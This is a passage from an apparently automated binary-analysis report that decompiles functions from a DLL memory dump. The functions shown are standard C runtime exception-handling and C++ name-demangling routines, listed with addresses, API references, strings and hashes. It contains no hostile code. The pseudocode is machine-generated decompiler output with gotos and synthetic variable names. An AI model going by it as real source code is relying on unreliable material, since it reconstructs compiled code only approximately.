																						if(_t333 > 0) {
																							continue;
																						} else {
																							_t298 = _v24;
																							_t259 = _v28;
																							_t306 = _v44;
																							goto L42;
																						}
																						goto L45;
																					}
																					_push(_a24);
																					_v5 = 1;
																					_push(_v32);
																					E6E19C21B(_t306, _t274, _a8, _v12, _a16, _a20,  &_v88,  *_t321,  &_v108, _a28, _a32);
																					_t338 = _t338 + 0x30;
																				}
																				L45:
																				_t303 = _v20;
																				goto L46;
																				L42:
																				_t298 = _t298 + 1;
																				_t259 = _t259 + 0x10;
																				_v24 = _t298;
																				_v28 = _t259;
																				__eflags = _t298 - _v96;
																			} while (_t298 != _v96);
																			goto L45;
																		}
																	}
																}
																L46:
																_t303 = _t303 + 1;
																_t252 = _v48;
																_t294 = _v36 + 0x14;
																_v20 = _t303;
																_v36 = _t294;
																__eflags = _t303 - _v60;
															} while (_t303 < _v60);
															_t308 = _a20;
															_t322 = 0;
															__eflags = 0;
														}
													}
													__eflags = _a24;
													if(_a24 != 0) {
														_push(1);
														E6E19B685();
														_t279 = _t274;
													}
													__eflags = _v5;
													if(_v5 != 0) {
														L62:
														_t226 = E6E19BF1F(_t274, _t279, _t303, _t308, _t322);
														__eflags =  *((intOrPtr*)(_t226 + 0x1c)) - _t322;
														if( *((intOrPtr*)(_t226 + 0x1c)) != _t322) {
															goto L69;
														} else {
															goto L63;
														}
													} else {
														__eflags = ( *_t308 & 0x1fffffff) - 0x19930521;
														if(( *_t308 & 0x1fffffff) < 0x19930521) {
															goto L62;
														} else {
															__eflags = _t308[7];
															if(_t308[7] != 0) {
																L55:
																_t230 = _t308[8] >> 2;
																__eflags = _t230 & 0x00000001;
																if((_t230 & 0x00000001) == 0) {
																	_push(_t308[7]);
																	_t231 = E6E19CD66(_t274);
																	_pop(_t279);
																	__eflags = _t231;
																	if(_t231 == 0) {
																		goto L66;
																	} else {
																		goto L62;
																	}
																} else {
																	 *(E6E19BF1F(_t274, _t279, _t303, _t308, _t322) + 0x10) = _t274;
																	_t240 = E6E19BF1F(_t274, _t279, _t303, _t308, _t322);
																	_t290 = _v12;
																	 *((intOrPtr*)(_t240 + 0x14)) = _v12;
																	goto L64;
																}
															} else {
																_t247 = _t308[8] >> 2;
																__eflags = _t247 & 0x00000001;
																if((_t247 & 0x00000001) == 0) {
																	goto L62;
																} else {
																	__eflags = _a28;
																	if(_a28 != 0) {
																		goto L62;
																	} else {
																		goto L55;
																	}
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L31;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L59;
														} else {
															goto L31;
														}
													}
												}
											}
										}
									} else {
										_v20 =  *((intOrPtr*)(E6E19BF1F(_t274, _t279, _t303, _t308, _t322) + 0x1c));
										_t270 = E6E19BF1F(_t274, _t279, _t303, _t308, _t322);
										_push(_v20);
										 *(_t270 + 0x1c) = _t322;
										_t271 = E6E19CD66(_t274);
										_pop(_t290);
										if(_t271 != 0) {
											goto L25;
										} else {
											_t308 = _v20;
											_t359 =  *_t308 - _t322;
											if( *_t308 <= _t322) {
												L64:
												E6E1ADB97(_t274, _t290, _t303, _t308, __eflags);
											} else {
												_t300 = _t322;
												_v20 = _t322;
												while(E6E19C974( *((intOrPtr*)(_t300 + _t308[1] + 4)), _t359, ?str?) == 0) {
													_t322 = _t322 + 1;
													_t290 = _v20 + 0x10;
													_v20 = _v20 + 0x10;
													_t359 = _t322 -  *_t308;
													if(_t322 >=  *_t308) {
														goto L64;
													} else {
														continue;
													}
													goto L65;
												}
											}
											L65:
											_push(1);
											_push(_t274);
											E6E19B685();
											_t279 =  &_v68;
											E6E19C949( &_v68);
											E6E19B94D( &_v68, 0x6e210304);
											L66:
											 *(E6E19BF1F(_t274, _t279, _t303, _t308, _t322) + 0x10) = _t274;
											_t233 = E6E19BF1F(_t274, _t279, _t303, _t308, _t322);
											_t279 = _v12;
											 *(_t233 + 0x14) = _v12;
											_t234 = _a32;
											__eflags = _t234;
											if(_t234 == 0) {
												_t234 = _a8;
											}
											E6E19B3E0(_t279, _t234, _t274);
											E6E19CC5B(_a8, _a16, _t308);
											_t237 = E6E19CE86(_t308);
											_t338 = _t338 + 0x10;
											_push(_t237);
											E6E19CBD2(_t274, _t279, _t303, _t308, _t322, __eflags);
											goto L69;
										}
									}
								}
							}
						}
					}
				}
			}

0x6e19c29b
0x6e19c29b
0x6e19c2a2
0x6e19c2a4
0x6e19c2ad
0x6e19c2b3
0x6e19c2b6
0x6e19c2bb
0x6e19c2be
0x6e19c2c4
0x6e19c64b
0x6e19c64b
0x6e19c650
0x6e19c652
0x6e19c654
0x6e19c657
0x6e19c658
0x6e19c65b
0x6e19c661
0x6e19c780
0x6e19c667
0x6e19c667
0x6e19c669
0x6e19c670
0x6e19c673
0x6e19c676
0x6e19c67c
0x6e19c67e
0x6e19c683
0x6e19c686
0x6e19c688
0x6e19c68e
0x6e19c690
0x6e19c696
0x6e19c6ab
0x6e19c6b0
0x6e19c6b3
0x6e19c6b5
0x6e19c77c
0x00000000
0x6e19c77d
0x6e19c6b5
0x6e19c696
0x6e19c68e
0x6e19c686
0x6e19c6bb
0x6e19c6be
0x6e19c6c1
0x6e19c6c4
0x6e19c6c7
0x6e19c6cd
0x6e19c6df
0x6e19c6e4
0x6e19c6e7
0x6e19c6ea
0x6e19c6ed
0x6e19c6f0
0x6e19c6f3
0x6e19c6f6
0x00000000
0x00000000
0x6e19c6fc
0x6e19c6fc
0x6e19c6ff
0x6e19c702
0x6e19c711
0x6e19c712
0x6e19c712
0x6e19c714
0x6e19c717
0x00000000
0x00000000
0x6e19c719
0x6e19c71c
0x00000000
0x00000000
0x6e19c72a
0x6e19c72c
0x6e19c72f
0x6e19c731
0x6e19c739
0x6e19c739
0x6e19c73c
0x6e19c73e
0x6e19c740
0x6e19c75c
0x6e19c761
0x6e19c764
0x6e19c764
0x00000000
0x6e19c73c
0x6e19c733
0x6e19c737
0x00000000
0x00000000
0x00000000
0x6e19c767
0x6e19c76a
0x6e19c76b
0x6e19c76e
0x6e19c771
0x6e19c774
0x6e19c777
0x6e19c777
0x00000000
0x6e19c702
0x6e19c781
0x6e19c786
0x6e19c787
0x6e19c78a
0x6e19c78d
0x6e19c78e
0x6e19c78f
0x6e19c790
0x6e19c793
0x6e19c795
0x6e19c80d
0x6e19c80f
0x6e19c80f
0x6e19c797
0x6e19c797
0x6e19c79a
0x6e19c79d
0x00000000
0x6e19c79f
0x6e19c79f
0x6e19c7a2
0x6e19c7a5
0x6e19c7ac
0x6e19c7ac
0x6e19c7af
0x6e19c7b1
0x6e19c7b3
0x6e19c7e5
0x6e19c7e5
0x6e19c7e8
0x6e19c7ef
0x6e19c7ef
0x6e19c7f2
0x6e19c7f5
0x6e19c7fc
0x6e19c7fc
0x6e19c7ff
0x6e19c806
0x6e19c808
0x6e19c808
0x6e19c801
0x6e19c801
0x6e19c804
0x00000000
0x00000000
0x6e19c804
0x6e19c7f7
0x6e19c7f7
0x6e19c7fa
0x00000000
0x00000000
0x6e19c7fa
0x6e19c7ea
0x6e19c7ea
0x6e19c7ed
0x00000000
0x00000000
0x6e19c7ed
0x6e19c809
0x6e19c7b5
0x6e19c7b5
0x6e19c7b5
0x6e19c7b8
0x6e19c7b8
0x6e19c7ba
0x6e19c7bc
0x00000000
0x00000000
0x6e19c7be
0x6e19c7c0
0x6e19c7d4
0x6e19c7d4
0x6e19c7c2
0x6e19c7c2
0x6e19c7c5
0x6e19c7c8
0x00000000
0x6e19c7ca
0x6e19c7ca
0x6e19c7cd
0x6e19c7d0
0x6e19c7d2
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19c7d2
0x6e19c7c8
0x6e19c7dd
0x6e19c7dd
0x6e19c7df
0x00000000
0x6e19c7e1
0x6e19c7e1
0x6e19c7e1
0x00000000
0x6e19c7df
0x6e19c7d8
0x6e19c7da
0x6e19c7da
0x00000000
0x6e19c7da
0x6e19c7a7
0x6e19c7a7
0x6e19c7aa
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19c7aa
0x6e19c7a5
0x6e19c79d
0x6e19c810
0x6e19c814
0x6e19c814
0x6e19c2d3
0x6e19c2d3
0x6e19c2dc
0x6e19c3de
0x6e19c3de
0x00000000
0x6e19c30b
0x6e19c30b
0x6e19c310
0x6e19c3e0
0x6e19c3e0
0x6e19c3e3
0x00000000
0x6e19c316
0x6e19c316
0x6e19c31e
0x6e19c5e2
0x6e19c5e6
0x6e19c324
0x6e19c329
0x6e19c32c
0x6e19c331
0x6e19c338
0x6e19c33d
0x00000000
0x6e19c375
0x6e19c37d
0x6e19c3e8
0x6e19c3e8
0x6e19c3eb
0x6e19c3ee
0x6e19c3ee
0x6e19c3f1
0x6e19c3f4
0x6e19c3fa
0x6e19c5b1
0x6e19c5b1
0x6e19c5b4
0x00000000
0x6e19c5b6
0x6e19c5b6
0x6e19c5ba
0x00000000
0x6e19c5c0
0x6e19c5c0
0x6e19c5c3
0x6e19c5c6
0x6e19c5c7
0x6e19c5c8
0x6e19c5cb
0x6e19c5cc
0x6e19c5cf
0x6e19c5d0
0x6e19c5d5
0x00000000
0x6e19c5d5
0x6e19c5ba
0x6e19c400
0x6e19c400
0x6e19c404
0x00000000
0x6e19c40a
0x6e19c40a
0x6e19c411
0x6e19c429
0x6e19c429
0x6e19c42c
0x6e19c432
0x6e19c442
0x6e19c447
0x6e19c44a
0x6e19c44d
0x6e19c450
0x6e19c453
0x6e19c456
0x6e19c459
0x6e19c45f
0x6e19c45f
0x6e19c462
0x6e19c465
0x6e19c474
0x6e19c475
0x6e19c475
0x6e19c477
0x6e19c47a
0x6e19c480
0x6e19c483
0x6e19c489
0x6e19c48b
0x6e19c48e
0x6e19c491
0x6e19c49a
0x6e19c49d
0x6e19c49f
0x6e19c49f
0x6e19c4a2
0x6e19c4a5
0x6e19c4a8
0x6e19c4ab
0x6e19c4ae
0x6e19c4b3
0x6e19c4b4
0x6e19c4b5
0x6e19c4b6
0x6e19c4b7
0x6e19c4ba
0x6e19c4bc
0x6e19c4be
0x00000000
0x6e19c4c0
0x6e19c4c0
0x6e19c4c0
0x6e19c4c3
0x6e19c4c6
0x6e19c4c8
0x6e19c4c9
0x6e19c4ce
0x6e19c4d1
0x6e19c4d3
0x00000000
0x00000000
0x6e19c4d5
0x6e19c4d6
0x6e19c4d9
0x6e19c4db
0x00000000
0x6e19c4dd
0x6e19c4dd
0x6e19c4e0
0x6e19c4e3
0x00000000
0x6e19c4e3
0x00000000
0x6e19c4db
0x6e19c4f7
0x6e19c4fd
0x6e19c501
0x6e19c51e
0x6e19c523
0x6e19c523
0x6e19c526
0x6e19c526
0x00000000
0x6e19c4e6
0x6e19c4e6
0x6e19c4e7
0x6e19c4ea
0x6e19c4ed
0x6e19c4f0
0x6e19c4f0
0x00000000
0x6e19c4f5
0x6e19c491
0x6e19c483
0x6e19c529
0x6e19c52c
0x6e19c52d
0x6e19c530
0x6e19c533
0x6e19c536
0x6e19c539
0x6e19c539
0x6e19c542
0x6e19c545
0x6e19c545
0x6e19c545
0x6e19c459
0x6e19c547
0x6e19c54b
0x6e19c54d
0x6e19c550
0x6e19c556
0x6e19c556
0x6e19c557
0x6e19c55b
0x6e19c5d8
0x6e19c5d8
0x6e19c5dd
0x6e19c5e0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19c55d
0x6e19c564
0x6e19c569
0x00000000
0x6e19c56b
0x6e19c56b
0x6e19c56f
0x6e19c581
0x6e19c584
0x6e19c587
0x6e19c589
0x6e19c5a0
0x6e19c5a4
0x6e19c5aa
0x6e19c5ab
0x6e19c5ad
0x00000000
0x6e19c5af
0x00000000
0x6e19c5af
0x6e19c58b
0x6e19c590
0x6e19c593
0x6e19c598
0x6e19c59b
0x00000000
0x6e19c59b
0x6e19c571
0x6e19c574
0x6e19c577
0x6e19c579
0x00000000
0x6e19c57b
0x6e19c57b
0x6e19c57f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19c57f
0x6e19c579
0x6e19c56f
0x6e19c569
0x6e19c413
0x6e19c413
0x6e19c41a
0x00000000
0x6e19c41c
0x6e19c41c
0x6e19c423
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19c423
0x6e19c41a
0x6e19c411
0x6e19c404
0x6e19c37f
0x6e19c387
0x6e19c38a
0x6e19c38f
0x6e19c393
0x6e19c396
0x6e19c39c
0x6e19c39f
0x00000000
0x6e19c3a1
0x6e19c3a1
0x6e19c3a4
0x6e19c3a6
0x6e19c5e7
0x6e19c5e7
0x6e19c3ac
0x6e19c3ac
0x6e19c3ae
0x6e19c3b1
0x6e19c3cd
0x6e19c3ce
0x6e19c3d1
0x6e19c3d4
0x6e19c3d6
0x00000000
0x6e19c3dc
0x00000000
0x6e19c3dc
0x00000000
0x6e19c3d6
0x6e19c3b1
0x6e19c5ec
0x6e19c5ec
0x6e19c5ee
0x6e19c5ef
0x6e19c5f6
0x6e19c5f9
0x6e19c607
0x6e19c60c
0x6e19c611
0x6e19c614
0x6e19c619
0x6e19c61c
0x6e19c61f
0x6e19c622
0x6e19c624
0x6e19c626
0x6e19c626
0x6e19c62b
0x6e19c637
0x6e19c63d
0x6e19c642
0x6e19c645
0x6e19c646
0x00000000
0x6e19c646
0x6e19c39f
0x6e19c37d
0x6e19c33d
0x6e19c31e
0x6e19c310
0x6e19c2dc

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6E19C396
type_info::operator==.LIBVCRUNTIME ref: 6E19C3BD
___TypeMatch.LIBVCRUNTIME ref: 6E19C4C9
CatchIt.LIBVCRUNTIME ref: 6E19C51E
IsInExceptionSpec.LIBVCRUNTIME ref: 6E19C5A4
_UnwindNestedFrames.LIBCMT ref: 6E19C62B
CallUnexpected.LIBVCRUNTIME ref: 6E19C646

Strings

csm, xrefs: 6E19C343
csm, xrefs: 6E19C3F4
csm, xrefs: 6E19C2D6
LH n, xrefs: 6E19C3B4

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: LH n$csm$csm$csm
API String ID: 4234981820-1737545738
Opcode ID: d8012e2f080cb3dfb473d2109b932cba7f241217b98a229753730ccd7f971709
Instruction ID: 379bce31cd9e81df635d642a4f43ee6ba4f98a5809982ebb4dbf72c00c180201
Opcode Fuzzy Hash: d8012e2f080cb3dfb473d2109b932cba7f241217b98a229753730ccd7f971709
Instruction Fuzzy Hash: 70C155B1900209AFDF15CFE4C88099EBBB9BF19314F20455AE891AB215D731EA91FF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A315F, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E1A315F(void* __ebx, void* __edx, void* __edi, void* __esi, char** _a4, char _a8, char _a12) {
				signed int _v8;
				char _v24;
				char* _v28;
				char* _v32;
				char _v33;
				char _v44;
				char** _v48;
				char _v56;
				char _v64;
				signed int _t50;
				char** _t56;
				char** _t57;
				char** _t59;
				char* _t65;
				char** _t76;
				intOrPtr* _t77;
				intOrPtr _t78;
				char* _t85;
				char _t86;
				signed int* _t114;
				char* _t117;
				intOrPtr* _t120;
				signed int* _t121;
				intOrPtr _t123;
				intOrPtr* _t124;
				signed int _t126;

				_t116 = __edi;
				_t115 = __edx;
				_t50 =  *0x6e212008; // 0xa172442e
				_v8 = _t50 ^ _t126;
				_t84 = _a4;
				_t120 =  *0x6e21304c; // 0x0
				_v48 = _a4;
				_t86 =  *_t120;
				_t53 = _t86 + 0xffffffd0;
				_v33 = _t86;
				if(_t86 + 0xffffffd0 > 9) {
					_push(__edi);
					if(_t86 != 0x3f) {
						if(E6E1A3606(_t120, "template-parameter-", 0x13) != 0) {
							if(E6E1A3606(_t120, "generic-type-", 0xd) != 0) {
								if(_a12 == 0 || _v33 != 0x40) {
									_t56 = E6E19D3EF( &_v56, 0x6e21304c, 0x40);
									L20:
									_t85 = _t56[1];
									_t117 =  *_t56;
								} else {
									_t117 = 0;
									_t85 = 0;
									 *0x6e21304c = _t120 + 1;
								}
								goto L21;
							}
							_v32 = "`generic-type-";
							_t123 = _t120 + 0xd;
							_v28 = 0xe;
							L9:
							 *0x6e21304c = _t123;
							E6E1A1EB0(_t115, _t116,  &_v44);
							if(( *0x6e213054 & 0x00004000) == 0 ||  *0x6e21305c == 0) {
								E6E19D8A2(E6E19D46F( &_v56,  &_v32),  &_v32,  &_v44);
								_t65 =  &_v64;
								goto L14;
							} else {
								E6E1A1F3F( &_v44,  &_v24, 0x10);
								_t124 =  *0x6e21305c; // 0x0
								 *0x6e204228(E6E1B0EB3( &_v44,  &_v24));
								if( *_t124() == 0) {
									E6E19D8A2(E6E19D46F( &_v64,  &_v32),  &_v32,  &_v44);
									_t65 =  &_v56;
									L14:
									_t56 = E6E19D8C4( &_v32, _t65, 0x27);
									goto L20;
								}
								_v28 = 0;
								_push(_v28);
								_t56 = E6E19D216( &_v44, _t71);
								goto L20;
							}
						}
						_v32 = "`template-parameter-";
						_t123 = _t120 + 0x13;
						_v28 = 0x14;
						goto L9;
					} else {
						_t76 = E6E1A23A4(__edx,  &_v44, 0);
						_t117 =  *_t76;
						_t85 = _t76[1];
						_t77 =  *0x6e21304c; // 0x0
						_v32 = _t117;
						_v28 = _t85;
						_t78 = _t77 + 1;
						 *0x6e21304c = _t78;
						if( *_t77 != 0x40) {
							_t79 = _t78 - 1;
							 *0x6e21304c = _t78 - 1;
							E6E19D795( &_v32, (0 |  *_t79 != 0x00000000) + 1);
							_t85 = _v28;
							_t117 = _v32;
						}
						L21:
						if(_a8 != 0) {
							_t121 =  *0x6e213044; // 0x0
							if( *_t121 != 9 && _t117 != 0) {
								_t59 = E6E1A0BB7(0x6e213068, 8);
								if(_t59 != 0) {
									 *_t59 = _t117;
									_t59[1] = _t85;
									 *_t121 =  *_t121 + 1;
									 *(_t121 + 4 +  *_t121 * 4) = _t59;
								}
							}
						}
						_t57 = _v48;
						 *_t57 = _t117;
						_t57[1] = _t85;
						goto L27;
					}
				} else {
					_t114 =  *0x6e213044; // 0x0
					 *0x6e21304c = _t120 + 1;
					E6E19D7C7(_t114, _t84, _t53);
					L27:
					return E6E199EE7(_v8 ^ _t126);
				}
			}

0x6e1a315f
0x6e1a315f
0x6e1a3165
0x6e1a316c
0x6e1a3170
0x6e1a3174
0x6e1a317a
0x6e1a317d
0x6e1a3182
0x6e1a3185
0x6e1a318b
0x6e1a31a8
0x6e1a31ac
0x6e1a3210
0x6e1a3237
0x6e1a3302
0x6e1a3321
0x6e1a3326
0x6e1a3326
0x6e1a3329
0x6e1a330a
0x6e1a330a
0x6e1a330d
0x6e1a330f
0x6e1a330f
0x00000000
0x6e1a3302
0x6e1a323d
0x6e1a3244
0x6e1a3247
0x6e1a324e
0x6e1a3251
0x6e1a3258
0x6e1a3268
0x6e1a32f4
0x6e1a32f9
0x00000000
0x6e1a3273
0x6e1a327c
0x6e1a3281
0x6e1a3294
0x6e1a329f
0x6e1a32c9
0x6e1a32ce
0x6e1a32d1
0x6e1a32d7
0x00000000
0x6e1a32d7
0x6e1a32a1
0x6e1a32a8
0x6e1a32ac
0x00000000
0x6e1a32ac
0x6e1a3268
0x6e1a3212
0x6e1a3219
0x6e1a321c
0x00000000
0x6e1a31ae
0x6e1a31b4
0x6e1a31bb
0x6e1a31bd
0x6e1a31c0
0x6e1a31c5
0x6e1a31c8
0x6e1a31cd
0x6e1a31ce
0x6e1a31d6
0x6e1a31dc
0x6e1a31df
0x6e1a31ee
0x6e1a31f3
0x6e1a31f6
0x6e1a31f6
0x6e1a332b
0x6e1a332f
0x6e1a3331
0x6e1a333a
0x6e1a3347
0x6e1a334e
0x6e1a3350
0x6e1a3352
0x6e1a3355
0x6e1a3359
0x6e1a3359
0x6e1a334e
0x6e1a333a
0x6e1a335d
0x6e1a3360
0x6e1a3362
0x00000000
0x6e1a3365
0x6e1a318d
0x6e1a318d
0x6e1a3196
0x6e1a319c
0x6e1a3366
0x6e1a3373
0x6e1a3373

APIs

Replicator::operator[].LIBVCRUNTIME ref: 6E1A319C
DName::operator=.LIBVCRUNTIME ref: 6E1A31EE

Strings

template-parameter-, xrefs: 6E1A3200
@, xrefs: 6E1A3304
generic-type-, xrefs: 6E1A3227
h0!n, xrefs: 6E1A3342
pR n, xrefs: 6E1A323D

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: @$generic-type-$h0!n$pR n$template-parameter-
API String ID: 3211817929-2147633987
Opcode ID: 386eb8bb9427d93fbe6b8b3b939edb9888393a3995c6921f5df9d95e0bc3cb30
Instruction ID: f7d3133049ed03923875f094d85e404df328692b0461d81f939ed47c0f2a8906
Opcode Fuzzy Hash: 386eb8bb9427d93fbe6b8b3b939edb9888393a3995c6921f5df9d95e0bc3cb30
Instruction Fuzzy Hash: 0D61B175D042099FDB04CFE9C859BEEBBFAAF19310F11441AD711A7280DB749A86EF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A2505, Relevance: 15.3, APIs: 10, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1A2505(void* __ebx, void* __edx, void* __edi, void* __esi, signed int* _a4) {
				signed int _v8;
				long _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v48;
				void* __ebp;
				signed int _t62;
				intOrPtr* _t64;
				char* _t65;
				signed int _t73;
				signed int _t79;
				signed int _t85;
				signed int _t86;
				signed int _t90;
				signed int _t126;
				signed int _t128;
				void* _t131;
				signed int* _t168;
				signed int _t170;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				void* _t181;

				_t166 = __edx;
				_t62 =  *0x6e212008; // 0xa172442e
				_v8 = _t62 ^ _t178;
				_t64 =  *0x6e21304c; // 0x0
				_t126 =  *_t64;
				_t65 = _t64 + 1;
				_t168 = _a4;
				_t170 = _t126;
				 *0x6e21304c = _t65;
				_v28 = _t170;
				_t181 = _t126 - 0x45;
				if(_t181 > 0) {
					__eflags = _t126 - 0x52;
					if(__eflags > 0) {
						__eflags = _t126 - 0x53;
						if(_t126 == 0x53) {
							 *_t168 =  *_t168 & 0x00000000;
							_t59 =  &(_t168[1]);
							 *_t59 = _t168[1] & 0x00000000;
							__eflags =  *_t59;
							L53:
							return E6E199EE7(_v8 ^ _t178);
						}
						__eflags = _t126 - 0x54 - 2;
						if(_t126 - 0x54 > 2) {
							L51:
							_t168[1] = _t168[1] & 0x00000000;
							 *_t168 =  *_t168 & 0x00000000;
							_t168[1] = 2;
							goto L53;
						}
						L38:
						E6E1A1EB0(_t166, _t168,  &_v40);
						E6E1A1F3F( &_v40,  &_v24, 0x10);
						_t73 = E6E1B0EB3( &_v40,  &_v24);
						__eflags =  *0x6e213054 & 0x00004000;
						_t171 = _t73;
						if(( *0x6e213054 & 0x00004000) == 0) {
							L42:
							swprintf( &_v24, 0x10, "%d", _t171 & 0x00000fff);
							_v36 = 0;
							_push(_v36);
							E6E19D216( &_v40,  &_v24);
							_t79 = _v28 - 0x52;
							__eflags = _t79;
							if(_t79 == 0) {
								L50:
								_v32 = "`template-type-parameter-";
								L49:
								_v28 = 0x19;
								L47:
								E6E19D8A2(E6E19D46F( &_v48,  &_v32),  &_v32,  &_v40);
								_push(0x27);
								L35:
								_push(_t168);
								E6E19D8C4( &_v32);
								goto L53;
							}
							_t85 = _t79;
							__eflags = _t85;
							if(_t85 == 0) {
								goto L50;
							}
							_t86 = _t85 - 1;
							__eflags = _t86;
							if(_t86 == 0) {
								_v32 = "`generic-class-parameter-";
								goto L49;
							}
							__eflags = _t86 != 1;
							if(_t86 != 1) {
								goto L51;
							}
							_v32 = "`generic-method-parameter-";
							_v28 = 0x1a;
							goto L47;
						}
						_t128 =  *0x6e21305c; // 0x0
						__eflags = _t128;
						if(_t128 == 0) {
							goto L42;
						}
						 *0x6e204228(_t73 & 0x00000fff);
						_t90 =  *_t128();
						__eflags = _t90;
						if(_t90 == 0) {
							goto L42;
						}
						_v36 = 0;
						_push(_v36);
						E6E19D216(_t168, _t90);
						goto L53;
					}
					if(__eflags == 0) {
						goto L38;
					}
					__eflags = _t126 - 0x4a;
					if(_t126 <= 0x4a) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E6E19E994( &_v32, 0x7b);
						_t129 = _t126 - 0x48;
						__eflags = _t126 - 0x48 - 2;
						if(__eflags <= 0) {
							_push( &_v40);
							E6E19D99C( &_v32, E6E19FD9A(_t129,  &_v32, __edx, _t168, __eflags));
							E6E19D9F3( &_v32, 0x2c);
						}
						_t173 = _t170 - 0x46;
						__eflags = _t173;
						if(_t173 == 0) {
							L32:
							E6E19D99C( &_v32, E6E1A1EB0(_t166, _t168,  &_v40));
							E6E19D9F3( &_v32, 0x2c);
							goto L33;
						} else {
							_t174 = _t173 - 1;
							__eflags = _t174;
							if(_t174 == 0) {
								L31:
								E6E19D99C( &_v32, E6E1A1EB0(_t166, _t168,  &_v40));
								E6E19D9F3( &_v32, 0x2c);
								goto L32;
							}
							_t175 = _t174 - 1;
							__eflags = _t175;
							if(_t175 == 0) {
								L33:
								E6E19D99C( &_v32, E6E1A1EB0(_t166, _t168,  &_v40));
								L34:
								_push(0x7d);
								goto L35;
							}
							_t176 = _t175 - 1;
							__eflags = _t176;
							if(_t176 == 0) {
								goto L32;
							}
							__eflags = _t176 != 1;
							if(_t176 != 1) {
								goto L34;
							}
							goto L31;
						}
					}
					__eflags = _t126 - 0x4d;
					if(_t126 != 0x4d) {
						goto L51;
					}
					E6E1A2816(_t126, __edx, _t168, _t170,  &_v32);
					__eflags = _v28 - 1;
					if(_v28 > 1) {
						goto L51;
					}
					E6E1A2505(_t126, __edx, _t168, _t170, _t168);
					L9:
					goto L53;
				}
				if(_t181 == 0) {
					_push(_t168);
					E6E19FD9A(_t126, _t131, __edx, _t168, __eflags);
					goto L9;
				}
				if(_t126 == 0) {
					 *0x6e21304c = _t65 - 1;
					E6E19D50F(_t168, 1);
					goto L53;
				}
				if(_t126 == 0x30) {
					E6E1A1EB0(__edx, _t168, _t168);
					goto L9;
				}
				if(_t126 == 0x31) {
					__eflags =  *_t65 - 0x40;
					if( *_t65 != 0x40) {
						_v32 = _v32 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						E6E19E994( &_v32, 0x26);
						_push( &_v40);
						E6E19D8A2( &_v32, _t168, E6E19FD9A(_t126,  &_v32, __edx, _t168, __eflags));
					} else {
						_v32 = "NULL";
						 *0x6e21304c = _t65 + 1;
						_v28 = 4;
						E6E19D46F(_t168,  &_v32);
					}
					goto L53;
				}
				if(_t126 == 0x32) {
					E6E1A2E83(_t126, __edx, _t168, _t170, _t168);
					goto L9;
				}
				if(_t126 == 0x34) {
					E6E1A2149(_t168, _t168);
					goto L9;
				}
				_t130 = _t126 - 0x41;
				if(_t126 - 0x41 > 1) {
					goto L51;
				}
				E6E1A065C(_t130, __edx, _t168, _t170, _t168, _t170);
				goto L9;
			}

0x6e1a2505
0x6e1a250b
0x6e1a2512
0x6e1a2515
0x6e1a251d
0x6e1a251f
0x6e1a2520
0x6e1a2523
0x6e1a2526
0x6e1a252b
0x6e1a252e
0x6e1a2531
0x6e1a2602
0x6e1a2605
0x6e1a26eb
0x6e1a26ee
0x6e1a27fe
0x6e1a2801
0x6e1a2801
0x6e1a2801
0x6e1a2805
0x6e1a2815
0x6e1a2815
0x6e1a26f7
0x6e1a26fa
0x6e1a27f1
0x6e1a27f1
0x6e1a27f5
0x6e1a27f8
0x00000000
0x6e1a27f8
0x6e1a2700
0x6e1a2704
0x6e1a2713
0x6e1a271c
0x6e1a2721
0x6e1a272b
0x6e1a272e
0x6e1a2763
0x6e1a2775
0x6e1a277d
0x6e1a2787
0x6e1a278b
0x6e1a2793
0x6e1a2793
0x6e1a2796
0x6e1a27e8
0x6e1a27e8
0x6e1a27df
0x6e1a27df
0x6e1a27b6
0x6e1a27cc
0x6e1a27d1
0x6e1a26dd
0x6e1a26dd
0x6e1a26e1
0x00000000
0x6e1a26e1
0x6e1a2799
0x6e1a2799
0x6e1a279c
0x00000000
0x00000000
0x6e1a279e
0x6e1a279e
0x6e1a27a1
0x6e1a27d8
0x00000000
0x6e1a27d8
0x6e1a27a3
0x6e1a27a6
0x00000000
0x00000000
0x6e1a27a8
0x6e1a27af
0x00000000
0x6e1a27af
0x6e1a2730
0x6e1a2736
0x6e1a2738
0x00000000
0x00000000
0x6e1a2742
0x6e1a2748
0x6e1a274b
0x6e1a274d
0x00000000
0x00000000
0x6e1a274f
0x6e1a2755
0x6e1a2759
0x00000000
0x6e1a2759
0x6e1a260b
0x00000000
0x00000000
0x6e1a2611
0x6e1a2614
0x6e1a263e
0x6e1a2645
0x6e1a264b
